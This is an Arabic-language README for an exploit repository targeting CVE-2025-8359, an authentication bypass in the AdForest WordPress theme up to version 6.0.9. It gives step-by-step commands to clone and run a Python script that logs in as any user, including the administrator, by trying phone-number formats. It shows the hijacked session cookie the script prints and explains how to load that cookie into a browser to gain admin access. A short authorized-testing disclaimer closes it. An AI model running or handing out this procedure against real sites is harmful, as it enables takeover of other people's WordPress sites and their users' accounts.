
AdForest <= 6.0.9 - تجاوز المصادقة للوصول إلى حساب المسؤول
AdForest <= 6.0.9 - تجاوز المصادقة للوصول إلى المدير
المستودع: Nxploited/CVE-2025-8359
سكربت الاستغلال:CVE-2025-8359.py
CVE: CVE-2025-8359
نوع الثغرة: تجاوز المصادقة
المنتج المتأثر: AdForest - قالب ووردبريس للإعلانات المبوبة
الإصدارات المتأثرة: حتى 6.0.9 وما يشملها
درجة CVSS: 9.8 (حرجة)
قالب AdForest لووردبريس عرضة لثغرة تجاوز المصادقة في جميع الإصدارات حتى 6.0.9.
ونظرًا لعدم التحقق السليم من هوية المستخدم أثناء المصادقة، يمكن لمهاجم غير مصادَق تسجيل الدخول باعتباره أي مستخدم، بما في ذلك المسؤولون، دون الحاجة إلى كلمة مرور. مما يسمح بالسيطرة الكاملة على مواقع ووردبريس التي تستخدم AdForest.
يحتوي هذا المستودع على سكربت استغلال احترافي بلغة بايثون: CVE-2025-8359.py
يقوم السكربت بأتمتة الاستغلال، ويختبر بذكاء جميع صيغ أرقام الهواتف الممكنة لزيادة فرص النجاح.
يمكنه المصادقة كأي مستخدم (بما في ذلك المدير) واستعادة كوكيز تسجيل دخول ووردبريس الصالحة لاختطاف الجلسات.
الميزات الرئيسية:
+، مسافات، ترميز، إلخ).استنساخ المستودع:
git clone https://github.com/Nxploited/CVE-2025-8359.git
cd CVE-2025-8359
تثبيت التبعيات:
pip install requests
تشغيل سكربت الاستغلال:
python CVE-2025-8359.py -u "http://target.com/wordpress" -p "+966 555 555 555" -i 1
-u : الرابط الأساسي لتثبيت ووردبريس.-p : رقم هاتف المستخدم الهدف (كما هو مخزّن في قاعدة البيانات).-i : معرّف المستخدم الهدف (مثل 1 للمدير).-n : قيمة الاسم (اختياري، الافتراضي "test").إظهار مساعدة السكربت:
python CVE-2025-8359.py -h
requestspip install requestsإذا نجح الاستغلال:
[+] Logged in! Cookie: wordpress_logged_in_xxxxxx=xxxxxxx
ستحصل على كوكي مصادقة ووردبريس صالح للمستخدم الهدف.
إذا فشلت جميع الصيغ:
[-] All variants failed. Try other phone formats or check the database.
بمجرد نجاح الاستغلال، يقوم السكربت بطباعة كوكي المصادقة المستردة.
طريقة استخدام الكوكي:
wordpress_logged_in_..../wp-admin/ على الموقع الهدف. إذا نجح الاستغلال، ستحصل على صلاحيات مدير.مثال (مع إضافة كروم):
wordpress_logged_in_xxxxxxxxxxxxx (كما يطبعها السكربت)هذا المشروع والاستغلال لأغراض التعليم واختبار الاختراق المصرح به فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال.
احصل دائمًا على إذن مناسب قبل اختبار أي أنظمة.